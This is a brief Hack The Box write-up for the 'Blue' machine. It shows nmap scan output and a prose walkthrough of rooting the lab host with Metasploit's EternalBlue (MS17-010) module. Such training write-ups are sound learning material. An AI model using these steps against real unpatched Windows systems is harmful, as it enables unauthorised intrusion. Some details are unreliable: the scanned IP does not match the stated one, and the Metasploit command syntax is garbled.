Post

HTB Blue Writeup

Posted
By Emma Ruby
2 min read

Blue Writeup

Description / TL;DR

This box is one of the easiest boxes on HTB with a 2 minute root, to root this box you have to use Etneral Blue(MS17-010) and you get a root shell

IP: 10.10.10.50

Basic Enumeration

Nmap - we start of by running nmap -sV -sC 10.10.10.50

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-30 23:23 ADT
Nmap scan report for 10.10.10.40
Host is up (0.052s latency).
Not shown: 992 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -31m39s, deviation: 34m36s, median: -11m41s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-07-01T03:13:13+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-06-30 23:13:11
|_  start_date: 2019-06-30 22:15:48

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.82 seconds

USER FLAG

nope we skip this we go straight to root

ROOT FLAG

From our nmap scan we notice that the server is running a version of SMB that is vulnerable to EtnernalBlue so we open up MetaSploit(msfconsole) and run search EtnernalBlue. we then use that exploit set the RHOST(set RHOST = 10.10.10.50) to the box’s ip LHOST(set LHOST (yourip)) to our ip and type exploit and then we get a meterpreter shell in which we can type bash and then navigate to the Admin’s desktop and get root.txt

WriteUp
This post is licensed under CC BY 4.0 by the author.